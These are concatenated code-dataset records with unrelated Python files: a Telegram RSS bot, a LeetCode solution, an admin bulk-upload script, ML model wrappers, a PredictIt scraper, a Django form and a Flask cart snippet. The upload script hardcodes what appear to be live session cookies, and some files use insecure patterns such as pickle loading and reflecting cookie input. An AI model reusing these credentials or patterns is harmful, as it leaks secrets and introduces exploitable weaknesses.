✅',\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkread\",\"rssmarkunread\")[1],entryid,isread,1)\n )\n ,\n InlineKeyboardButton(\n '✨ ✅',\n callback_data=\"rssmarkunstar,%d,%d,%d\" % (entryid, isread, 1)\n )\n ]]\n callbackanswer = '已星标'\n elif args[0] == 'rssmarkunread':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦',\n callback_data=\"rssmarkread,%d,%d,%d\" % (entryid,0,isstar)\n )\n ,\n InlineKeyboardButton(\n '✨'+['', ' ✅'][isstar],\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkstar\",\"rssmarkunstar\")[isstar], entryid, 0, isstar)\n )\n ]]\n callbackanswer = '已标记为未读'\n elif args[0] == 'rssmarkunstar':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦'+['', ' ✅'][isread],\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkread\",\"rssmarkunread\")[isread],entryid,isread,0)\n )\n ,\n InlineKeyboardButton(\n '✨',\n callback_data=\"rssmarkstar,%d,%d,%d\" % (entryid, isread, 0)\n )\n ]]\n callbackanswer = '已去掉星标'\n else:\n return\n motd_markup = InlineKeyboardMarkup(motd_keyboard)\n bot.edit_message_text(\n chat_id = chat_id, \n message_id = origin_message_id,\n text = text,\n reply_markup = motd_markup\n )\n bot.answer_callback_query(\n callback_query_id=update.callback_query.id,\n text=callbackanswer\n )\n if args[0] == 'rssmarkread':\n var.set('rssunreadnum',var.get('rssunreadnum', 1)-1)\n miniflux_client.markread(entryid)\n elif args[0] == 'rssmarkstar':\n miniflux_client.markread(entryid)\n miniflux_client.markstar(entryid)\n elif args[0] == 'rssmarkunread':\n miniflux_client.markunread(entryid)\n elif args[0] == 'rssmarkunstar':\n miniflux_client.markunstar(entryid)\n else:\n return\n\n\n# _handler = CallbackQueryHandler(callback_query, pattern = r'$(rssmarkread|rssmarkstar|rssmarkunread|rssmarkunstar),')\n\n_handler = CallbackQueryHandler(callback_query)\n","sub_path":"callback_rss.py","file_name":"callback_rss.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"467239713","text":"'''\n合并两个有序链表\nCategory\tDifficulty\tLikes\tDislikes\nalgorithms\tEasy (58.09%)\t940\t-\n\n将两个升序链表合并为一个新的升序链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。 \n\n示例:\n输入:1->2->4, 1->3->4\n输出:1->1->2->3->4->4\n'''\n\n\n# @lc code=start\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = ListNode(None)\n head.next = l1\n pre = head\n cr1 = l1\n cr2 = l2\n \n while(cr1 and cr2 ):\n if(cr2.val >cr1.val):\n cr1 = cr1.next\n pre = pre.next\n else:\n temp = cr2.next\n\n pre.next = cr2\n cr2.next = cr1\n cr2 = temp\n\n pre = pre.next\n pre.next = cr1 if cr1 else cr2\n return head.next\n\n# @lc code=end\n\n'''\nAccepted\n208/208 cases passed (60 ms)\nYour runtime beats 18.41 % of python3 submissions\nYour memory usage beats 5 % of python3 submissions (13.7 MB)\n'''","sub_path":"DHY_LeetCode/Linked-List/0021.py","file_name":"0021.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65873228","text":"import requests\nimport csv\n\nurl = \"https://devadmin.meeidol.com/news/add\"\ndata = {\n 'pic_cover': '876637a69787021adb61820b83ddf177',\n 'title': 'upload',\n 'intro': 'test',\n 'text': '',\n 'video_id' : '',\n 'news_sort': 0,\n 'stars': [],\n}\n\ncookies = {\n '_csrf-backend': \"df68a2adeda1dc72d2afa0e190fc461d00fe76321ea4a4036f7948b203855a6ba%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf-backend%22%3Bi%3A1%3Bs%3A32%3A%223lamAdjYYRqb2Pu5ORPPmgHuEzzu6qaP%22%3B%7D\",\n 'advanced-backend': \"o256humaabj1cceg7ti89ei190\"\n}\n\n#r = requests.post(url, data=data, cookies=cookies)\n\ncsv_file = open('video.csv', 'r')\nread_csv = csv.reader(csv_file)\n\nfor i in read_csv:\n# print(i[0], i[1])\n data['pic_cover'] = i[0]\n data['video_id'] = i[0]\n data['title'] = i[1]\n data['intro'] = i[1]\n r = requests.post(url, data=data, cookies=cookies)\n print(i[0], r.text.find('true') >= 0)\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"190369720","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport warnings\nwarnings.simplefilter('ignore')\n\nimport os\nimport sys\nimport numpy as np\nimport pickle\nimport json\nimport re\nimport pandas as pd\n\nfrom sklearn import tree\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import KFold\nimport pydotplus\nfrom sklearn.externals.six import StringIO\n\nfrom skopt import gp_minimize\nfrom nysol.mining.cPredict import cPredict\n\nclass ctree(object):\n\tdef __init__(self,x_df=None,y_df=None):\n\t\tif x_df is not None and y_df is not None:\n\t\t\tself.setDataset(x_df,y_df)\n\t\tself.tree_chart=None\n\n\tdef setDataset(self,x_df,y_df):\n\t\tprint(\"##MSG: setting dataset ...\")\n\t\tif len(y_df.columns)!=1:\n\t\t\traise BaseException(\"##ERROR: DataFrame of y variable must be one column data\")\n\n\t\tself.yName=y_df.columns[0]\n\t\tclassDist=y_df[self.yName].value_counts().to_dict()\n\t\t# print(classDist)\n\t\t# {'-': 373, '+': 305}\n\t\tself.labels=sorted([c for c in classDist.keys()])\n\t\t# ['+', '-']\n\n\t\t# オリジナルクラス値を0/1に変換 => cross validationでのみ利用(文字型のクラスを受け付けないので)\n\t\tstr2num={c:i for i,c in enumerate(self.labels)}\n\t\t# print(str2num)\n\t\t# {'+': 0, '-': 1}\n\t\tself.y01=np.array([str2num[v] for v in y_df[self.yName].values])\n\t\tself.y=y_df.values.reshape((-1,))\n\n\t\tself.xNames=list(x_df.columns)\n\t\tself.x=x_df.values.reshape((-1,len(x_df.columns)))\n\n\t\t# クラスサイズ最小値が10以下ならcross validationできないことを判定させるため=>build()の最初で利用\n\t\tself.y_minClassSize=min(classDist.values())\n\n\tdef objectiveFunction(self,spaces):\n\t\tparams=self.params\n\t\tparams[\"min_samples_leaf\"]=spaces[0]\n\t\tclf=tree.DecisionTreeClassifier(**params)\n\n\t\t#skFold=KFold(n_splits=10,random_state=11)\n\t\t#skFold=StratifiedKFold(n_splits=10,random_state=11)\n\n\t\t#print(cross_val_score(clf, self.x, self.y, cv=skFold, scoring='neg_mean_squared_error'))\n\t\tscore=np.mean(cross_val_score(clf, self.x, self.y01, cv=self.skFold, scoring='neg_mean_squared_error'))*(-1)\n\t\tprint(\"space\",spaces[0],score)\n\t\treturn score\n\n\tdef build(self,params,opt_param=None,visualizing=True):\n\t\tprint(\"##MSG: building model ...\")\n\t\tif opt_param is not None:\n\t\t\tparams[\"min_samples_leaf\"]=opt_param\n\t\tif \"min_samples_leaf\" not in params:\n\t\t\tparams[\"min_samples_leaf\"]=0.0\n\t\tself.params=params\n\n\t\tself.cv_minFun=None\n\t\tself.cv_minX=None\n\t\t#print(self.y_minClassSize)\n\t\t#print(params[\"min_samples_leaf\"])\n\t\t#if self.y_minClassSize>=10 and not \"min_samples_leaf\" in params and params[\"min_samples_leaf\"]==0.0:\n\t\tif self.y_minClassSize>=10 and params[\"min_samples_leaf\"]==0.0:\n\t\t\tif True:\n\t\t\t\tgrid_param ={'min_samples_leaf':[i/100 for i in range(1,50,1)]}\n\n\t\t\t\tclf=tree.DecisionTreeClassifier(**params)\n\t\t\t\tgrid_search = GridSearchCV(clf, param_grid=grid_param, cv=10, scoring='neg_mean_squared_error',verbose = 0)\n\t\t\t\tgrid_search.fit(self.x,self.y01)\n\t\t\t\tparams[\"min_samples_leaf\"]=grid_search.best_params_['min_samples_leaf']\n\t\t\t\t#print(\"opt\",\"%f,%f\"%(grid_search.best_params_['min_samples_leaf'],grid_search.best_score_))\n\t\t\telse:\n\t\t\t\t# ベイズ最適化による最適min_samples_leafの探索(CVによる推定)\n\t\t\t\tself.skFold=StratifiedKFold(n_splits=10,random_state=11)\n\t\t\t\tspaces = [(0.0001,0.5, 'uniform')] # min_samples_leafの最大は0.5\n\t\t\t\tres = gp_minimize(self.objectiveFunction, spaces, n_calls=20, random_state=11)\n\t\t\t\tself.cv_minFun=res.fun # 最小の目的関数値\n\t\t\t\tself.cv_minX=res.x[0] # 最適パラメータ(枝刈り度)\n\t\t\t\t#print(res) # 目的関数値\n\t\t\t\t#print(minFun,minX) # 目的関数値\n\t\t\t\t#print(res.x) # min_impurity_decrease 最適値\n\t\t\t\t#exit()\t\n\t\t\t\t# 最適枝刈り度のセット\n\t\t\t\tparams[\"min_samples_leaf\"]=self.cv_minX\n\t\t\t\tprint(\"opt\",\"%f,%f\"%(self.cv_minX,self.cv_minFun))\n\t\t#elif self.y_minClassSize<10:\n\t\t#\tdel params[\"min_samples_leaf\"]\n\n\t\tself.model=tree.DecisionTreeClassifier(**params)\n\t\tself.model.fit(self.x, self.y)\n\t\tself.score=self.model.score(self.x, self.y)\n\t\tself.opt_param=params[\"min_samples_leaf\"]\n\n\t\tif visualizing:\n\t\t\tself.visualize()\n\n\tdef predict(self,x_df):\n\t\tx=x_df.values.reshape((-1,len(x_df.columns)))\n\n\t\t#print(\"x.shape=\",x.shape,self.model.ds.x.shape)\n\t\ty_pred=self.model.predict(x) # [0 0 0 0 0 0 0 ...] # pred class表\n\t\ty_prob=self.model.predict_proba(x) # sample * class prob 表\n\t\t# [[9.86925146e-01 1.30748490e-02 5.13506829e-09]\n\t\t# [9.81685740e-01 1.83142489e-02 1.10697584e-08]...\n\n\t\t# y_prob等のclassの出力順\n\t\torderedLabels=self.model.classes_\n\n\t\t# id込みのDataFrameに変換\n\t\ty_pred=pd.DataFrame(y_pred)\n\t\ty_pred.index=x_df.index #.to_list()\n\t\ty_pred.columns=[\"y_predicted\"]\n\n\t\ty_prob=pd.DataFrame(y_prob)\n\t\ty_prob.index=x_df.index #.to_list()\n\t\tnames=[]\n\t\tfor c in orderedLabels:\n\t\t\tnames.append(\"prob_\"+str(c))\n\t\ty_prob.columns=names\n\n\t\tpred=cPredict(y_pred,y_prob,orderedLabels)\n\n\t\treturn pred\n\n\t\tpred=cPredict()\n\t\tx=x_df.values.reshape((-1,len(x_df.columns)))\n\n\t\t# 以下の各処理では、例外なく0.0/1.0のクラス値は元のクラス名に戻してやる\n\t\tpred.y_pred=self.model.predict(x)\n\t\tpred.y_prob=self.model.predict_proba(x)\n\t\tpred.probClassOrder=self.model.classes_ # y_probの出力順\n\t\tpred.id=x_df.index #.to_list()\n\t\tpred.labels=self.labels\n\t\treturn pred\n\n\tdef load(iFile):\n\t\twith open(iFile, 'rb') as fpr:\n\t\t\tmodel = pickle.load(fpr)\n\t\treturn model\n\n\tdef save(self,oPath):\n\t\tos.makedirs(oPath,exist_ok=True)\n\t\toFile=\"%s/model.sav\"%(oPath)\n\t\twith open(oFile, 'wb') as fpw:\n\t\t\tpickle.dump(self, fpw)\n\n\t\twith open(\"%s/tree.txt\"%(oPath),\"bw\") as f:\n\t\t\tf.write(self.tree_text.encode(\"utf-8\"))\n\n\t\tif self.tree_chart:\n\t\t\t# png,pdfはgraphvizのversionによって動かないのでsvgでいく\n\t\t\tself.tree_chart.write_svg(\"%s/tree.svg\"%(oPath))\n\t\t\t#self.tree_chart.write_png(\"%s/tree.png\"%(oPath))\n\t\t\t#self.tree_chart.write_pdf(\"%s/tree.pdf\"%(oPath))\n\n\tdef visualize(self):#,oFile,features=None,classes=None):\n\t\tclasses=[str(v) for v in self.model.classes_] # y_probの出力順\n\n\t\t# image\n\t\tdot_data = StringIO()\n\t\t#tree.export_graphviz(self.model, out_file=dot_data,feature_names=self.xNames)\n\t\tdot=tree.export_graphviz(self.model,feature_names=self.xNames,class_names=classes)\n\n\t\t# dot フォーマット強制変換\n\t\t#あとで項目名対応する or treeのメソッドを実装\n\t\tnewdot=[]\n\t\tpre_pattern = r'^[0-9]* \\[label=\"'\n\t\tsuf_pattern = r'\"] ;$'\n\t\tfor line in dot.split('\\n'):\n\t\t\tif re.match(pre_pattern , line):\n\t\t\t\tlbl = re.sub(suf_pattern , '' ,re.sub(pre_pattern,'',line))\n\t\t\t\tlbldata = lbl.split(\"\\\\n\")\n\t\t\t\tif len(lbldata) == 5:\n\t\t\t\t\tlblval=lbldata[0].split(' ')\n\t\t\t\t\tlblval0 = lblval[0].split(\"_\")\n\t\t\t\t\tif len(lblval0) > 1:\n\t\t\t\t\t\tif lblval[-2] == \"<=\":\n\t\t\t\t\t\t\tnn = \"_\".join(lblval0[0:-1])\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tnewlable = 'label=\"%s == %s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\"] ;'%(nn,lblval0[-1],lbldata[1],lbldata[2],lbldata[3],lbldata[4])\n\t\t\t\t\t\t\tnewdot.append(re.sub(r'label=\".*\"] ;',newlable,line))\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnn = \"_\".join(lblval0[0:-1])\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tnewlable = 'label=\"%s != %s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\"] ;'%(nn,lblval0[-1],lbldata[1],lbldata[2],lbldata[3],lbldata[4])\n\t\t\t\t\t\t\tnewdot.append(re.sub(r'label=\".*\"] ;',newlable,line))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewdot.append(line)\n\n\t\t\t\telse:\n\t\t\t\t\tnewdot.append(line)\n\n\t\t\telse:\n\t\t\t\tnewdot.append(line)\n\n\t\tnewdotstr = '\\n'.join(newdot)\n\t\tself.tree_chart=pydotplus.graph_from_dot_data(newdotstr)\n\n\t\t# text\n\t\tself.tree_text=tree.export_text(self.model,feature_names=self.xNames,show_weights=True)\n\nif __name__ == '__main__':\n\timport dataset as ds\n\tdef senario1():\n\t\tconfig={}\n\t\tconfig[\"type\"]=\"table\"\n\t\tconfig[\"vars\"]=[\n\t\t\t[\"id\",\"id\",{}],\n\t\t\t[\"n1\",\"numeric\",{}],\n\t\t\t[\"n2\",\"numeric\",{}],\n\t\t\t[\"n3\",\"numeric\",{}],\n\t\t\t[\"n4\",\"numeric\",{}],\n\t\t\t[\"d1\",\"dummy\",{\"dummy_na\":True,\"drop_first\":True,\"dtype\":float}],\n\t\t\t[\"d2\",\"dummy\",{}],\n\t\t\t[\"d3\",\"dummy\",{}],\n\t\t\t[\"i1\",\"dummy\",{}],\n\t\t\t[\"i2\",\"dummy\",{}],\n\t\t\t[\"class\",\"class\",{}]\n\t\t]\n\t\tdata=ds.mkTable(config,\"./data/crx2.csv\")\n\t\tdata=data.dropna()\n\t\ty=ds.cut(data,[\"class\"])\n\t\tx=ds.cut(data,[\"class\"],reverse=True)\n\t\tds.show(x)\n\t\tds.show(y)\n\n\t\tmodel=ctree(x,y)\n\t\tparams={\"max_depth\": 10}\n\t\tmodel.build(params)\n\t\tmodel.save(\"xxctree_model_crx\")\n\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\t#print(pred.y_pred)\n\t\t#print(pred.y_true)\n\t\t#print(pred.y)\n\t\t#print(pred.stats)\n\t\t#print(pred.charts)\n\t\t#pred.charts[\"true_pred_scatter\"].savefig(\"xxa.png\")\n\t\t#pred.charts[\"roc_chart\"]\n\t\t#pred.charts[\"confusion_matrix_plot\"]\n\t\t#plt.show()\n\t\tpred.save(\"xxctree_pred_crx\")\n\n\t\tmodel=ctree.load(\"xxctree_model_crx/model.sav\")\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\tpred.save(\"xxctree_pred_crx2\")\n\n\tdef iris():\n\t\tfrom sklearn.datasets import load_iris\n\t\tiris = load_iris()\n\t\tconfig={}\n\t\tconfig[\"type\"]=\"table\"\n\t\tconfig[\"vars\"]=[\n\t\t\t[\"sepal length\",\"numeric\",{}],\n\t\t\t[\"sepal width\" ,\"numeric\",{}],\n\t\t\t[\"petal lengt\" ,\"numeric\",{}],\n\t\t\t[\"petal width\" ,\"numeric\",{}]\n\t\t]\n\t\tx=ds.mkTable(config,iris.data)\n\n\t\tconfig={}\n\t\tconfig[\"type\"]=\"table\"\n\t\tconfig[\"vars\"]=[\n\t\t\t[\"species\",\"category\",{}]\n\t\t]\n\t\ty=ds.mkTable(config,iris.target)\n\t\tds.show(x)\n\t\tds.show(y)\n\n\t\tmodel=ctree(x,y)\n\t\t# build(self,l1_ratio=1.0,cv=10,Cs=40,max_iter=100)\n\t\tmodel.build(max_iter=10000)\n\t\tmodel.save(\"xxctree_model_iris\")\n\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\tpred.save(\"xxctree_pred_iris\")\n\n\t\tmodel=ctree.load(\"xxctree_model_iris/model.sav\")\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\tpred.save(\"xxctree_pred_iris2\")\n\n\tsenario1()\n\t#iris()\n\texit()\n\n\n\n\timport pandas as pd\n\tfrom nysol.mining.csv2df import csv2df\n\tiFile=\"/Users/hamuro/nysol/miningpy/nysol/mining/data/crx2.csv\"\n\tdf,ds=csv2df(iFile,\"id\",[\"n1\",\"n2\",\"n3\",\"n4\"],[\"class\"],[\"d1\",\"d2\",\"d3\",\"i1\",\"i2\"])\n\n\tyName=\"class\"\n\txNames=list(ds.columns) #.to_list()\n\txNames.remove(yName)\n\tcrx_y=pd.DataFrame(ds.loc[:,yName])\n\tcrx_x=ds.loc[:,xNames]\n\tparams={\"max_depth\": 10}\n\tmodel=ctree(crx_x,crx_y,config)\n\tmodel.build()\n\tprint(\"cv_minFunc\",model.cv_minFun)\n\tprint(\"cv_minX\",model.cv_minX)\n\tprint(\"score\",model.score)\n\tmodel.visualize()\n\tmodel.save(\"xxctree_model_crx\")\n\n\tpred=model.predict(crx_x)\n\tpred.evaluate(crx_y)\n\tpred.save(\"xxctree_pred_crx\")\n\t#print(pred.y_pred)\n\t#print(pred.y_prob)\n\texit()\n\tmodel=None\n\tmodel=ctree.load(\"xxctree_model_crx/model.sav\")\n\tpred=model.predict(crx_x)\n\tpred.save(\"xxctree_pred_crx2\")\n\n\n\tfrom sklearn.datasets import load_iris\n\tiris = load_iris()\n\tprint(iris.data)\n\tprint(iris.target)\n\n\tconfig={}\n\tconfig[\"type\"]=\"table\"\n\tconfig[\"names\"]=[\"sepal length\",\"sepal width\",\"petal length\",\"petal width\"]\n\tconfig[\"convs\"]=[\"numeric()\",\"numeric()\",\"numeric()\",\"numeric()\"]\n\tiris_x=ds.mkTable(config,iris.data)\n\tds.show(iris_x)\n\n\tconfig={}\n\tconfig[\"type\"]=\"table\"\n\tconfig[\"names\"]=[\"species\"]\n\tconfig[\"convs\"]=[\"category()\"]\n\tiris_y=ds.mkTable(config,iris.target)\n\tds.show(iris_y)\n\n\tmodel=ctree(iris_x,iris_y)\n\n\t#print(tbl.__class__.__name__)\n\tmodel.build(params)\n\tmodel.visualize()\n\tmodel.save(\"xxctree_model_iris\")\n\n\tpred=model.predict(iris_x)\n\t#print(pred.y_prob[0],pred.y_pred[0])\n\tpred.evaluate(iris_y)\n\tpred.save(\"xxctree_pred_iris\")\n\t#print(pred.y_pred)\n\t#print(pred.y_prob)\n\n\tmodel=None\n\tmodel=ctree.load(\"xxctree_model_iris/model.sav\")\n\tpred=model.predict(iris_x)\n\tpred.save(\"xxctree_pred_iris2\")\n\tprint(model.labels)\n\n\n","sub_path":"nysol/mining/ctree.py","file_name":"ctree.py","file_ext":"py","file_size_in_byte":11279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341329811","text":"#!/usr/bin/env python3\n\n#########################\n#\n# name: pull_data.py\n# description: gets the data\n# of interest (probability of\n# winning nomination\n# and probability of\n# winning general,\n# calculates implied conditional\n# win prob and writes output to\n# csv\n###########################\n\nimport urllib.request\nimport urllib.parse\nimport json\nimport datetime\nimport pytz\nimport csv\nimport os\nimport sys\n\n# global url/path parameters \napi_prefix = \"https://www.predictit.org/api/marketdata/markets/\"\nall_market_api = \"https://www.predictit.org/api/marketdata/all/\"\noutdir = \"../dat\"\ncsv_name = \"candidate_win_probabilities.csv\"\ncsv_path = os.path.join(outdir, csv_name)\n\ndem_nominee_id = 3633\ngop_nominee_id = 3653\npres_winner_id = 3698\n\ndefault_markets = {\n \"dem-nominee\": dem_nominee_id,\n \"gop-nominee\": gop_nominee_id,\n \"pres-winner\": pres_winner_id}\n\ndef mkdirp(file_path):\n directory = os.path.dirname(file_path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_market(market_id, api_prefix = api_prefix):\n full_url = urllib.request.urljoin(api_prefix, str(market_id))\n response = urllib.request.urlopen(full_url)\n txtdata = response.read()\n result = json.loads(txtdata)\n if result is None:\n raise ValueError(\"No parseable market found for market id \"\n \"{}\".format(market_id))\n return result\n\ndef get_all_markets(all_market_api = all_market_api):\n response = urllib.request.urlopen(all_market_api)\n txtdata = response.read()\n result = json.loads(txtdata)\n if result is None:\n raise ValueError(\"No parseable market data \"\n \"found for market api \"\n \"{}\".format(all_market_api))\n return result['markets']\n\n\ndef prune_market(market_dict, min_price):\n return {contract['name']: contract for\n contract in market_dict['contracts']\n if contract['bestBuyYesCost'] > min_price}\n\n\ndef get_latest_prices(min_price = 0.01,\n markets = default_markets):\n\n markets = {market_name: prune_market(get_market(market_id),\n min_price)\n for market_name, market_id in markets.items()}\n\n return markets\n\ndef calc_conditional_prob(candidate_id,\n nominee_market,\n pres_market,\n win_prob_key=\"bestBuyYesCost\"):\n win_nom = nominee_market.get(candidate_id, {}).get(win_prob_key)\n win_pres = pres_market.get(candidate_id, {}).get(win_prob_key)\n if win_nom is not None and win_pres is not None:\n return win_pres / win_nom\n else:\n return None\n \ndef pull_current_data(win_prob_key=\"bestBuyYesCost\"):\n\n current_datetime = datetime.datetime.now(pytz.utc)\n \n data = get_latest_prices()\n\n results = []\n \n for party in ['dem', 'gop']:\n party_results = data[party + '-nominee']\n for candidate in party_results.keys():\n pres_prob = data['pres-winner'].get(candidate, {}).get(win_prob_key, None)\n nom_prob = party_results.get(candidate, {}).get(win_prob_key, None)\n cond_prob = calc_conditional_prob(candidate,\n party_results,\n data['pres-winner'])\n new_row = {\n 'candidate': candidate,\n 'party': party,\n 'probNominee': nom_prob,\n 'probPresident': pres_prob,\n 'probPresidentGivenNominee': cond_prob,\n 'whenPulled': current_datetime.isoformat()\n }\n\n results.append(new_row)\n\n pass\n\n return results \n\n\ndef pull_and_save_data(csv_path=csv_path):\n\n new_data = pull_current_data()\n\n mkdirp(csv_path)\n \n with open(csv_path, 'a+') as f:\n f.seek(0) # jump to the beginning of the file\n try:\n header = next(csv.reader(f))\n dict_writer = csv.DictWriter(f, header) # header found\n except StopIteration: # no header found\n header = list(new_data[0].keys())\n dict_writer = csv.DictWriter(f, header)\n dict_writer.writeheader()\n f.seek(0,2) # jump back to the end of the file\n for data_row in new_data:\n try:\n dict_writer.writerow(data_row)\n except ValueError:\n print(\"Error writing row to csv. \"\n \"Check for header/key mismatch\\n\\n\"\n \"Header: {}\\n\"\n \"Keys: {}\\n\\n\".format(header, data_row.keys()))\n raise\n print(\"Data successfully pulled and written to csv \"\n \"{}\".format(csv_path))\n \nif __name__ == \"__main__\":\n script_path = os.path.relpath(sys.argv[0])\n if 'src' in script_path:\n run_outdir = \"dat\"\n else:\n run_outdir = \"../dat\"\n out_path = os.path.join(run_outdir, csv_name)\n \n pull_and_save_data(csv_path=out_path)\n","sub_path":"src/pull_data.py","file_name":"pull_data.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"474806916","text":"# matching model\nimport os\nimport sys\nimport random\nimport numpy as np\nfrom keras.layers import *\nfrom keras.models import Model, Sequential\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom keras import initializers\nfrom keras.models import load_model\nimport tensorflow as tf\nfrom match import cosine_sim, euclidean_sim\n\n\ndef conv(input):\n\treg = l2(0.0005)\n\tx = Conv2D(32,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block1_conv1')(input)\n\tx = Conv2D(32,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block1_conv2')(x)\n\tx = MaxPooling2D((2,2), name = 'block1_pool')(x)\n\tx = Dropout(0.25)(x)\n\n\tx = Conv2D(64,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block2_conv1')(x)\n\tx = Conv2D(64,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block2_conv2')(x)\n\tx = MaxPooling2D((2,2), name = 'block2_pool')(x)\n\tx = Dropout(0.25)(x)\n\n\tx = Conv2D(128,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block3_conv1')(x)\n\tx = Conv2D(128, (3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block3_conv2')(x)\n\tx = MaxPooling2D((2,2), name = 'block3_pool')(x)\n\tx = Dropout(0.25)(x)\n\n\tx = Flatten()(x)\n\n\tx = Dense(units = 256, activation = 'elu', kernel_regularizer = reg, name = 'fc1')(x)\n\t#x = Dense(units = 64, activation = 'elu', kernel_regularizer = reg, name = 'fc2')(x)\n\n\treturn x\n\n\ndef matching_net(sample_ = 5, average_per_class_ = True, img_size = 32, batch_size = 32, nway = 20):\n\tn_supportset_ = sample_ * nway\n\tinput1 = Input((n_supportset_, img_size, img_size ,3))\n\tinput2 = Input((img_size, img_size ,3))\n\n\ttmp_in = Input((img_size, img_size, 3))\n\tconv_emb = conv(tmp_in)\n\tconv_net = Model(inputs = tmp_in, outputs = conv_emb)\n\tconv_net.load_weights('model/pretrained2.h5', by_name = True)\n\t#conv_net.load_weights('model/matching_pre2.h5', by_name = True)\n\n\tsupport_label = Input((n_supportset_, nway))\n\n\tinputs = []\n\tfor lidx in range(n_supportset_):\n\t\t\tinputs.append(conv_net(Lambda(lambda x: x[:,lidx,:,:,:])(input1)))\n\n\tinputs.append(conv_net(input2))\n\n\tinputs.append(support_label)\n\n\t#out = euclidean_sim(nway = nway, sample = sample)(inputs)\n\tout = cosine_sim(nway = nway, sample = sample_, batch = batch_size, average_per_class = average_per_class_)(inputs)\n\n\tmodel = Model(inputs = [input1, input2, support_label], outputs = out)\n\n\treturn conv_net, model","sub_path":"task2/matchingnet/matching_model.py","file_name":"matching_model.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248640994","text":"# _*_ coidng:utf-8 _*_\nfrom django import forms\nfrom django.core.exceptions import ValidationError\n\ndef words_validator(comment):\n if len(comment) < 4:\n raise ValidationError('Not enough words')\n\ndef comment_validator(comment):\n if 'a' in comment:\n raise ValidationError('Don\\'t use \\'a\\' word')\n\nclass CommentForm(forms .Form):\n name = forms.CharField(max_length=50)\n comment = forms.CharField(\n widget=forms.Textarea(),\n error_messages={\n 'required': 'wwwwwws'\n },\n validators=[words_validator,comment_validator],\n )\n","sub_path":"01/firstsite/firstapp/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631040639","text":"#!/usr/bin/env python2\n# coding=utf-8\n\nall = ['robot']\n\nimport os, sys\n\ncurrent_path = os.path.dirname(__file__)\napp_root = os.path.join(current_path, os.path.pardir, os.path.pardir)\nsys.path.insert(0, app_root) # 网站根目录加入搜索路径\n\nimport template\nfrom models import CmdAdmin, Canteen, Meal\n\n\n############## Models ##################\ndef print_orders(order):\n return template.orderinfo.format(order.name, order.canteen,\n order.studentName, order.studentId, order.birthday, order.token)\n\n\ndef print_my_orders(my_order):\n return template.myorder.format(\n Meal.get(my_order.mealId).name,\n my_order.studentName,\n my_order.studentId,\n my_order.birthday,\n Canteen.get(my_order.canteenId).name,\n my_order.token)\n\n\ndef authchecker(func):\n \"\"\"\n 管理员权限验证\n \"\"\"\n\n def _authchecker(message):\n try:\n result = CmdAdmin.getBy(weixinId=message.source)\n if result == None:\n pass\n else:\n return func(message)\n except Exception as err:\n return \"出现错误: \" + str(err)\n\n return _authchecker\n","sub_path":"controllers/webchat/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"13213730","text":"from flask import Flask, request, make_response\napp = Flask(__name__)\n\ncestos = {}\n@app.route(\"/adicionaAoCesto\")\ndef adicionaAoCesto():\n\n prodID = request.args.get('prodID')\n userID = request.cookies.get('userID')\n cestos[userID].append(prodID)\n return f\"Produto adicionado! Cesto agora tem:
